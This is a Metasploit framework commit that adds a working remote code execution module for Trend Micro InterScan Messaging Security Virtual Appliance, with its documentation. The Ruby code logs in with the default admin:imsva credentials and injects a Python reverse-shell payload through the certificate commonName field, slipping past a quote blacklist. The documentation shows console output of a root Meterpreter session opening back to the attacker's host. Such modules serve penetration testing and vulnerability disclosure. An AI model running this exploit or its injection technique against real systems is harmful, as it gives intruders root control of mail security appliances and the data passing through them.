Land rapid7#7969, Add Module Trend Micro IMSVA Remote Code Execution

wchen-r7 · wchen-r7 · commit 48f6740fee97 · 2017-02-21T17:29:04.000-06:00
diff --git a/documentation/modules/exploit/linux/http/trend_micro_imsva_exec.md b/documentation/modules/exploit/linux/http/trend_micro_imsva_exec.md
@@ -0,0 +1,71 @@
+## Vulnerable Application
+
+This module exploits a command injection vulnerability in the Trend Micro InterScan Messaging Security (Virtual Appliance) product. An authenticated user can execute a terminal command under the context of the web server user which is root. Besides, default installation of IMSVA comes with a default administrator credentials.
+
+saveCert.imss endpoint takes several user inputs and performs blacklisting. After that it use them as argument of predefined operating system command without proper sanitation. However,due to improper blacklisting rule it's possible to inject arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
+
+**Vulnerable Application Installation Steps**
+
+IMSVA is distrubed as an ISO image by Trend Micro.
+
+Following steps are valid on the CentOS 6 x64 bit operating system.
+
+1. Open following URL [http://downloadcenter.trendmicro.com/](http://downloadcenter.trendmicro.com/)
+2. Find "InterScan Messaging Security (Virtual Appliance)" and click.
+3. At the time of writing this documentation, you must see "IMSVA-9.1-1600-x86-64-r2.iso" next to Download button.
+4. Click to the download button and complete installation of ISO.
+
+If you don't see a affected version of IMSVA, you can try to download IMSVA-9.1-1600 directly from following URL.
+
+[http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso](http://files.trendmicro.com/products/imsva/9.1/IMSVA-9.1-1600-x86_64-r2.iso)
+
+**System requirements:**
+- Virtualbox or VMware can be used. 
+- 4 GB of memory at least.
+- 120 GB of disk size at least.
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+```
+msf > use exploit/linux/http/trend_micro_imsva_exec 
+msf exploit(trend_micro_imsva_exec) > set RHOST 12.0.0.140
+RHOST => 12.0.0.140
+msf exploit(trend_micro_imsva_exec) > set LHOST 12.0.0.1 
+LHOST => 12.0.0.1
+msf exploit(trend_micro_imsva_exec) > exploit 
+
+[*] Started reverse TCP handler on 12.0.0.1:4444 
+[*] Attempting to login with admin:imsva
+[+] Authenticated as admin:imsva
+[*] Delivering payload...
+[*] Sending stage (38622 bytes) to 12.0.0.140
+[*] Meterpreter session 1 opened (12.0.0.1:4444 -> 12.0.0.140:60822) at 2017-01-18 11:29:36 +0300
+
+meterpreter > getuid
+Server username: root
+meterpreter >
+```
+
+You must be getting ```no access``` error if the supplied username and password or default credentials are wrong.
+
+```
+msf exploit(trend_micro_imsva_exec) > back
+msf > use exploit/linux/http/trend_micro_imsva_exec 
+msf exploit(trend_micro_imsva_exec) > set RHOST 12.0.0.140
+RHOST => 12.0.0.140
+msf exploit(trend_micro_imsva_exec) > set LHOST 12.0.0.1 
+LHOST => 12.0.0.1
+msf exploit(trend_micro_imsva_exec) > 
+msf exploit(trend_micro_imsva_exec) > set USERNAME notvalid
+USERNAME => notvalid
+msf exploit(trend_micro_imsva_exec) > set PASSWORD notvalid123
+PASSWORD => notvalid123
+msf exploit(trend_micro_imsva_exec) > exploit 
+
+[*] Started reverse TCP handler on 12.0.0.1:4444 
+[*] Attempting to login with notvalid:notvalid123
+[-] Exploit aborted due to failure: no-access: 12.0.0.140:8445 - Login with notvalid:notvalid123 failed...
+[*] Exploit completed, but no session was created.
+```
diff --git a/modules/exploits/linux/http/trend_micro_imsva_exec.rb b/modules/exploits/linux/http/trend_micro_imsva_exec.rb
@@ -0,0 +1,146 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a command injection vulnerability in the Trend Micro
+        IMSVA product. An authenticated user can execute a terminal command under
+        the context of the web server user which is root. Besides, default installation
+        of IMSVA comes with a default administrator credentials.
+
+        saveCert.imss endpoint takes several user inputs and performs blacklisting.
+        After that it use them as argument of predefined operating system command
+        without proper sanitation. However,due to improper blacklisting rule it's possible to inject
+        arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
+
+        This module was tested against IMSVA 9.1-1600.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mehmet Ince <mehmet@mehmetince.net>' # discovery & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/']
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'Space'       => 1024,
+          'DisableNops' => true,
+          'BadChars'    => "\x2f\x22"
+        },
+      'DefaultOptions' =>
+        {
+          'SSL' => true,
+          'payload' => 'python/meterpreter/reverse_tcp',
+        },
+      'Platform'       => ['python'],
+      'Arch'           => ARCH_PYTHON,
+      'Targets'        => [ ['Automatic', {}] ],
+      'DisclosureDate' => 'Jan 15 2017',
+      'DefaultTarget'  => 0
+       ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']),
+        OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]),
+        OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]),
+        Opt::RPORT(8445)
+      ]
+    )
+  end
+
+  def login
+
+    user = datastore['USERNAME']
+    pass = datastore['PASSWORD']
+
+    print_status("Attempting to login with #{user}:#{pass}")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'login.imss'),
+      'vars_post' => {
+        'userid' => user,
+        'pwdfake' => Rex::Text::encode_base64(pass)
+      }
+    })
+
+    if res && res.body.include?("The user name or password you entered is invalid")
+      fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...")
+    end
+
+    cookie = res.get_cookies
+    if res.code == 302 && cookie.include?("JSESSIONID")
+      jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first
+      print_good("Authenticated as #{user}:#{pass}")
+      return jsessionid
+    end
+
+    nil
+  end
+
+  def exploit
+
+    jsessionid = login
+
+    unless jsessionid
+      fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
+    end
+
+    # Somehow java stores last visited url on session like viewstate!
+    # Visit form before submitting it. Otherwise, it will cause a crash.
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'initCert.imss'),
+      'cookie' => "JSESSIONID=#{jsessionid}"
+    })
+
+    if !res or !res.body.include?("Transport Layer Security")
+      fail_with(Failure::Unknown, 'Unable to visit initCert.imss')
+    end
+
+    # Random string that will be used as a cert name, state, email etc.
+    r = Rex::Text::rand_text_alphanumeric(5)
+
+    print_status("Delivering payload...")
+
+    # Since double quote are blacklisted, we are using Single, Backslash, Single, Single on our payload. Thanks to @wvu !!!
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'saveCert.imss'),
+      'cookie' => "JSESSIONID=#{jsessionid}",
+      'vars_get' => {
+          'mode' => 0
+      },
+      'vars_post' => {
+        'certName' => r,
+        'certType' => 0,
+        'keyLength' => 2048,
+        'countryCode' => 'TR',
+        'state' => r,
+        'locality' => r,
+        'org' => r,
+        'orgUnit' => r,
+        'commonName' => "#{r}';python -c '#{payload.encoded.gsub("'", "'\\\\''")}' #",
+        'emailAddress' => "#{r}@mail.com",
+        'validDays' => '',
+        'id' => '',
+      }
+    })
+  end
+
+end
